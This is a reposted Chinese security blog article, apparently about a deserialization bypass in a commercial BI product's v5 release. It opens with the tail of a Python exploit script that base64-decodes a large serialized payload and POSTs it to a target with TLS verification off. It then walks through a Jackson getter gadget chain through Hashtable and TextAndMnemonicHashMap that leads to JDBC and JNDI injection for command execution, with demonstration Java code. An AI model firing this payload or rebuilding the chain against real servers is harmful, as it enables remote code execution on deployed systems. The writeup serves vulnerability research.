gaHatgalVCVmS9+8f7xB3qerEmSJBQNDYuz4c7mLI2zIsMK2AKexG+yzoyTZn+6QB0YmjgKLHtk/ZUfjwcEaSRI+wSfe+FjX20Vt5lY1JE25YSfsnTTTf75hIezdiRxSbK7uxun66uh7erqwmlHSOs4cPk2vw8eN9Mx//zp30sO9/3kucdUj2mLDCR3lc75h5sGVxXvf1yqLOUm/QZHwgYHO+HNr/9xnLlW8WvC2YsHX32t/cRdgVVq5AUq7kiiO8ZNxskHqupxqsy+cHrDFW9X/+0JUlOZDci7rYx22hJnFyRFesGkeCv17adf2tnyjORWa8qkWh+L8bAouRncFBmZSVLKrZGlI6q0pEqPMPgOhcNF8skDj3d2Pnv0L0oGlmOXZG4ko+J0B5ZmJXF7tRI7Bm1rkhocj7JPd79aOPGjZhUeW6tmgWfPr/nGo0/0jn1Snd1xg7N7JwQc1dx7POYxHc9Oc7D3fYzD7bPenSNXEghw6gRkHQNeO6vgNVSy0E1xZh/8w5MXzhbt7wRBRqqIL5k6Cnph5kTNcefhralvvnLqt/HE8Sn6yhpzsNK3f/21bZf3eL9PYHlJQULpNs/aOoNiB2QFvI1f/GotQKNBEQ3acMinJ4R/MmfC9V++vXbPTT23/DQOECXFKFy5hNe/9PMdm3eVzj+fJLWAUDQKNTZs9rJshZQIInQAFIY5AD0TkJjUDJAQGF07NgomhZNrKpFPsNGnqiKwWCE8B7Eb9NJQS0BQrbGARdwKEYnse7EcrKksB3N5Jvq37N799oZdgdMQ0t98gwO06Wdf3rTzpdMJUgs2Nw2LDXrFCcaxqTLNpFhusiZ0sqDtTBpmvMmmALVM2/pgvBHVXHCrRNLgwvmLaVTXJfW7Daghe6Tgu+AmnWAXfBL4bSo9QKHakCb8zz9RW4TvcN9NUbxDTzcVhBEdB6yirRuThixHYNW3lmzseuqvj7T65QhWUFQWQqPznRlE66v3kQeev/eNNZJNDZSblTHvRWQ9fi+ol32gVvYAnI+WVaXHpxe03bTwrMBejo8RoVrkhiA2iqCiESLH3xw5tf0/K5/6e4LU5/EFoFZzvb5jQgjdmQe2GWAbQNAQucyv94hGIRz3eZYOkIzcNvfofvBmQC8k3lKkiI9VvsZCYxG8fgTcXAVUoFaAZatTK8C3AFzenXWwM805EDan+ffuX9G/ru3o8Y/LLFgEKczd6OXVgEgriyC4WSmPzzYRtxTe7VAEZQgI3zxH+PUsV7/oew2Xtz89IvMV+dwLjwCVE+uyNncgjVALhCnpbdVeSlntM/88+ec9l1K3JkirRGsQiVxhXP+9utLITkNRYPpBaoqc1TsB7/vsSAFweHzDgA1E7pD7iseARLSLweUaF3gbc4ZhI5/jz7hCOchYjC1dIv1sMcTEauHQNONB1PjvzoBmnDSot6VMntQ4qZfvRjm7OYxynB2c5xFYEAzTLxJYjz3RE2FRl0ka/j6AKqqncExFtRCpWK4AbkHnk66T36qGWMpLJ/6VfP1vo83rE6RJvstC/8Br0jeXqfrQqnlvw33e5KRM2pSiLLhFt+LtO8wZmAswAvZOv+e0+AaWXFHtSTiv1vA8rkwtAPbwwS2KgetbfDNVMFFrIRMfNHCyci5+VXpnGhpevPrs1V/L10Sdpn6aqBfTqPA4qZuhpsfw14Ssb3FofjA5t2ny3MuHT50JGlzrO4Fov+4aEWgx38WxjBy75bhDOvw9cpPFvgEB+NLIHDnI3inGl738tW+9cfKh2xVskxcvB88vSadK6INnvtDe/OgfPxuifqlKYoFfz3C9jkS/bOG8sboXIpKurgLp4dpaHDY4yiQb/8enDp7eUs0TBhe3Luyc6hAqLu/G4SFHkvThzQOcUXMBv+Rw2I/DR0MAIl+JAzgM4jCEQyHo3jg5gMOY/DoeXkwWhnD4BA5HJAmtvP68MoJfWXip9xi+/xdRPyvHUvm/IG6jkrEWAAA="


burp0_data = base64.b64decode(b)

res = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)

print(res.content.decode("gbk", errors="ignore"))

某软BI v5反序列化绕过

分析

此链利用了jackson的getter,
com.fasterxml.jackson.databind.ObjectWriter#writeValueAsString会调用到相关对象的getter方法,

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.example</groupId>
<artifactId>jackson_getter</artifactId>
<version>1.0-SNAPSHOT</version>

<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.11.2</version>
</dependency>

<dependency>
<groupId>org.lucee</groupId>
<artifactId>javassist</artifactId>
<version>3.9.0.GA</version>
</dependency>
</dependencies>

</project>

实验脚本,

package org.example;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;

import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class Main {

public static void main(String[] args) throws Exception, ClassCastException {

Test test = new Test();
User user = new User(test, "qqq");
ObjectMapper mapper = new ObjectMapper();
String json = mapper.writeValueAsString(user);
System.out.println(json);
}
}


package org.example;

public class Test {
public String testaaa = "111";
public int testbbb = 222;

public String getTestaaa() {
System.out.println("getTestaaa");
return testaaa;
}
public int getTestbbb(){
System.out.println("getTestbbb");
return testbbb;
}
}


package org.example;

public class User {
public Test test;
public String user;

public User(Test test, String user){
this.test = test;
this.user = user;


}
public Test getTest(){
System.out.println("getTest");
return test;
}

public String getUser(){
System.out.println("getUser");
return user;
}
}

从com.fasterxml.jackson.databind.ObjectWriter#writeValueAsString开始,

某软BI v5反序列化绕过

com.fasterxml.jackson.databind.ser.BeanSerializerFactory#findBeanProperties
这里会得到传入类的参数属性,

某软BI v5反序列化绕过

利用getAccessor函数,最终得到属性的getter方法,

某软BI v5反序列化绕过

某软BI v5反序列化绕过

最终通过com.fasterxml.jackson.databind.ser.BeanPropertyWriter#serializeAsField,反射getter函数,

某软BI v5反序列化绕过

因此我们需要去找谁调用了writeValueAsString函数,
发现JSONArray和JsonStringArrayList的tostring函数调用了writeValueAsString函数,
JSONArray

某软BI v5反序列化绕过

某软BI v5反序列化绕过

某软BI v5反序列化绕过

JsonStringArrayList

某软BI v5反序列化绕过

因此入口点有以上两个,目前需要去找谁能调用到他们的tostring函数,
javax.swing.UIDefaults$TextAndMnemonicHashMap,
其中get函数会调用到key的tostring,

某软BI v5反序列化绕过

接下来分许怎么使得key为JSONArray或者JsonStringArrayList,目的是调用到tostring,

需要分析hashtable为什么会 进入到equals()中,
hashtable的readobject()->reconstitutionPut()->key.hashcode()
我们传入hashtable的key为hashmap包装的键和值,或者直接继承hashmap,
当hashtable调用到key.hashcode()时,就会到hashmap中的hashcode(),如果我们将hashmap的键和值设置一样的数据,那么hashcode()执行后结果就为0,
因此节点中的hash会和我们传出key的hash相同,都为0,

某软BI v5反序列化绕过

又因为javax.swing.UIDefaults$TextAndMnemonicHashMap继承hashmap,
因此会到AbstractMap的equals中,
然后调用key的get,TextAndMnemonicHashMap中的get函数去调用到了tostring函数,
刚好满足条件,

某软BI v5反序列化绕过

以上满足了反序列化调用getter方法,那么我们需要找到可利用的getter方法,
其中com.fr.third.alibaba.druid.pool.xa.DruidXADataSource和oracle.jdbc.rowset.OracleCachedRowSet的getter可被利用,

jdbc链:
com.fr.third.alibaba.druid.pool.xa.DruidXADataSource,
初始化连接池开始连接,那么我们就可以去设置jdbc的各个参数,然后使用mysql组件去连接我们的恶意服务器,(这里可用mysql,h2,oracle,sqli等)

某软BI v5反序列化绕过

某软BI v5反序列化绕过

调用栈堆:

某软BI v5反序列化绕过

某软BI v5反序列化绕过

jndi链:
oracle.jdbc.rowset.OracleCachedRowSet,
getter里面存在looup,可以进行jndi注入,不过最新某软的java版本为java_8u191,
ldap和rmi远程调用都失败了,
可以利用jndi反序列化或者加载本地factory来绕过达到命令执行的效果,

某软BI v5反序列化绕过

调用栈堆:

某软BI v5反序列化绕过

某软BI v5反序列化绕过

当然,jndi注入还可以加载本地的factory绕过高版本的限制,这里刚好存在com.alibaba.druid.pool.DruidDataSourceFactory,
因此利用本地factory也能绕过,不过DruidDataSourceFactory的getObjectInstance函数执行了getconnect()就又成了jdbc注入,就是需要依赖数据库组件漏洞(反序列化和rce),目前某软BI的mysql和h2组件因为版本问题不能rce或者反序列化,不过hsqldb组件存在rce,利用hsqldb的历史漏洞---call调用静态代码也能达到反序列化或者jndi注入,

某软BI v5反序列化绕过

参考:
https://tttang.com/archive/1611/
https://tttang.com/archive/1405/#toc_0x03-jdbc-rce
https://sp4zcmd.github.io/2021/09/21/JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/
https://www.freebuf.com/articles/web/358310.html
https://xz.aliyun.com/t/10656?time__1311=mq%2BxBDy7G%3DLOD%2FD0DoYR%2BDmxQqGK%3DG8iK4PD

来源:【某软BI v5反序列化绕过 - 先知社区 (aliyun.com)

原文始发于微信公众号(船山信安):某软BI v5反序列化绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日18:33:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某软BI v5反序列化绕过http://cn-sec.com/archives/3126544.html

发表评论

匿名网友 填写信息